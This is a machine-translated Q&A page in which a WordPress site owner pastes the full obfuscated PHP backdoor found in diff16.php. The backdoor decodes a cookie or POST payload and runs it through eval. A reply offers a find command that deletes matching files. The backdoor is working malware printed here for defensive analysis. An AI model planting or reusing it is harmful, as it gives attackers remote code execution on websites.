我在我最近在我的网站上发起的攻击请求帮助/建议......这次攻击基本上是垃圾邮件我的电子邮件帐户很多我也有一些可疑的文件我怀疑我会很感激第二只眼睛。我已经成功删除了主要的垃圾邮件脚本,但想了解这个文件wp-includes / Text / Diff / diff16.php是本机的还是外来的
另外,由于垃圾邮件的数量庞大,我如何清除Linux上的外发邮件,这会使我的服务器陷入困境并占用太多空间?
以下是diff16.php
上的可疑代码<?php $GLOBALS['h8d181c'] = "\x3e\x2d\x2f\x72\x40\x50\x2c\x21\x78\x42\x47\x60\x49\x52\x7d\x6d\x24\x34\x33\x3b\x54\x6e\x4f\x71\x5c\x35\x22\x6f\x20\x73\x26\x5e\x30\x6c\x37\x9\x43\x2b\x5b\x36\x27\x56\x7b\x6a\x3d\x70\x3a\x5d\x59\x44\x25\x4b\x55\x39\x66\x7a\x64\x51\x7e\x32\xa\x45\x5a\x58\x7c\x31\x57\x4d\x41\x68\x67\x69\x74\x77\x61\x29\x53\x38\x4a\x2a\x4c\x63\x65\x28\xd\x76\x79\x6b\x3f\x46\x2e\x48\x5f\x62\x4e\x23\x3c\x75";
$GLOBALS[$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][25]] = $GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][69].$GLOBALS['h8d181c'][3];
$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][59]] = $GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][56];
$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]] = $GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][21];
$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]] = $GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][21].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][72];
$GLOBALS[$GLOBALS['h8d181c'][73].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][25]] = $GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][55].$GLOBALS['h8d181c'][82];
$GLOBALS[$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][39]] = $GLOBALS['h8d181c'][45].$GLOBALS['h8d181c'][69].$GLOBALS['h8d181c'][45].$GLOBALS['h8d181c'][85].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][21];
$GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][65]] = $GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][21].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][55].$GLOBALS['h8d181c'][82];
$GLOBALS[$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]] = $GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][82];
$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][81]] = $GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][72];
$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][32]] = $GLOBALS['h8d181c'][86].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][59];
$GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][59]] = $GLOBALS['h8d181c'][69].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56];
$GLOBALS[$GLOBALS['h8d181c'][70].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][18]] = $_POST;
$GLOBALS[$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56]] = $_COOKIE;
@$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]]($GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][70], NULL);
@$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]]($GLOBALS['h8d181c'][33].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][70].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][3].$GLOBALS['h8d181c'][29], 0);
@$GLOBALS[$GLOBALS['h8d181c'][23].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][18]]($GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][27].$GLOBALS['h8d181c'][21].$GLOBALS['h8d181c'][92].$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][82], 0);
@$GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][81]](0);
$rb00 = NULL;
$c174 = NULL;
$GLOBALS[$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][34]] = $GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][32];
global $e57c7;
function h114d($rb00, $n06f3)
{
$t89f0c4 = "";
for ($p89c=0; $p89c<$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($rb00);)
{
for ($b8a92b=0; $b8a92b<$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($n06f3) && $p89c<$GLOBALS[$GLOBALS['h8d181c'][43].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($rb00); $b8a92b++, $p89c++)
{
$t89f0c4 .= $GLOBALS[$GLOBALS['h8d181c'][72].$GLOBALS['h8d181c'][77].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][25]]($GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][59]]($rb00[$p89c]) ^ $GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][17].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][59]]($n06f3[$b8a92b]));
}
}
return $t89f0c4;
}
function y26e2($rb00, $n06f3)
{
global $e57c7;
return $GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][59]]($GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][59]]($rb00, $e57c7), $n06f3);
}
foreach ($GLOBALS[$GLOBALS['h8d181c'][8].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][54].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56]] as $n06f3=>$g476b4c9)
{
$rb00 = $g476b4c9;
$c174 = $n06f3;
}
if (!$rb00)
{
foreach ($GLOBALS[$GLOBALS['h8d181c'][70].$GLOBALS['h8d181c'][34].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][18]] as $n06f3=>$g476b4c9)
{
$rb00 = $g476b4c9;
$c174 = $n06f3;
}
}
$rb00 = @$GLOBALS[$GLOBALS['h8d181c'][97].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][82].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][65]]($GLOBALS[$GLOBALS['h8d181c'][71].$GLOBALS['h8d181c'][53].$GLOBALS['h8d181c'][81].$GLOBALS['h8d181c'][32]]($GLOBALS[$GLOBALS['h8d181c'][15].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][25].$GLOBALS['h8d181c'][34]]($rb00), $c174));
if (isset($rb00[$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][87]]) && $e57c7==$rb00[$GLOBALS['h8d181c'][74].$GLOBALS['h8d181c'][87]])
{
if ($rb00[$GLOBALS['h8d181c'][74]] == $GLOBALS['h8d181c'][71])
{
$p89c = Array(
$GLOBALS['h8d181c'][45].$GLOBALS['h8d181c'][85] => @$GLOBALS[$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][59].$GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][18].$GLOBALS['h8d181c'][39]](),
$GLOBALS['h8d181c'][29].$GLOBALS['h8d181c'][85] => $GLOBALS['h8d181c'][65].$GLOBALS['h8d181c'][90].$GLOBALS['h8d181c'][32].$GLOBALS['h8d181c'][1].$GLOBALS['h8d181c'][65],
);
echo @$GLOBALS[$GLOBALS['h8d181c'][73].$GLOBALS['h8d181c'][39].$GLOBALS['h8d181c'][56].$GLOBALS['h8d181c'][93].$GLOBALS['h8d181c'][25]]($p89c);
}
elseif ($rb00[$GLOBALS['h8d181c'][74]] == $GLOBALS['h8d181c'][82])
{
eval($rb00[$GLOBALS['h8d181c'][56]]);
}
exit();
}
答案 0 :(得分:1)
我还在试图找出如何阻止这些文件出现在我的服务器上,但我至少可以删除它们,这里有一个可能有帮助的oneliner:
find . -type f -name "*.php" -exec fgrep -m 1 -F "\$GLOBALS[\$GLOBALS[" {} \; -delete
它基本上抓取当前目录(和子目录),使用这样的代码搜索文件并删除它们。 (也许你想先没有-delete指令尝试它,以确保你不会删除任何应该保留的文件。)